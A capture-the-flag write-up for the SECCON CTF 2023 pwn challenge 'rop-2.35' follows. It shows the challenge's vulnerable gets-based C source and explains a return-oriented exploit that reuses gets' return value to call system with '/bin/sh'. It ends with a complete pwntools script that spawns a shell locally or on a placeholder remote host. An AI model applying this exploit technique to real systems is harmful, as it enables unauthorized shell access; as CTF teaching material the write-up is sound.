# SECCON CTF 2023 - [pwn] rop-2.35
```c
#include <stdio.h>
#include <stdlib.h>
void main() {
char buf[0x10];
system("echo Enter something:");
gets(buf);
}
```
There is an obvius stack overflow.
## Exploitation
The gadgets in the binary are limited, we can use
the return value (rax) of `gets` which is `buf`
and this gadget:
```c
.text:0000000000401169 mov rdi, rax
.text:000000000040116C call _system
```
to set rdi to `buf` in which we can write `/bin/sh`
we need also to pad our chain with 2 ret to align the stack
otherwise system will crash due to `movaps`.
```py
#!/bin/env python3
from pwn import *
elf = context.binary = ELF("./chall")
context.arch = 'amd64'
context.terminal = ['tmux','splitw','-h']
io = None
convert = lambda x :x if type(x)==bytes else str(x).encode()
s = lambda data :io.send(convert(data))
sl = lambda data :io.sendline(convert(data))
sla = lambda delim,data :io.sendlineafter(convert(delim), convert(data), timeout=context.timeout)
ru = lambda delims, drop=True :io.recvuntil(delims, drop, timeout=context.timeout)
r = lambda n :io.recv(n)
rl = lambda :io.recvline()
HOST, PORT = '10.10.10.10', 1337
gdbscript = '''
set follow-fork-mode parent
br *main+46
br *main+39
c
'''
def start():
if args.GDB:
return gdb.debug(elf.path, gdbscript=gdbscript)
if args.REMOTE:
return remote(HOST, PORT)
else:
return process(elf.path)
io = start()
ret = 0x40101a
mov_rdi_rax = 0x401169
payload = b"/bin/sh\x00" * 3 + p64(ret)*2 + p64(mov_rdi_rax)
sl(payload)
io.interactive()
```
Sign in with Wallet
Connect another wallet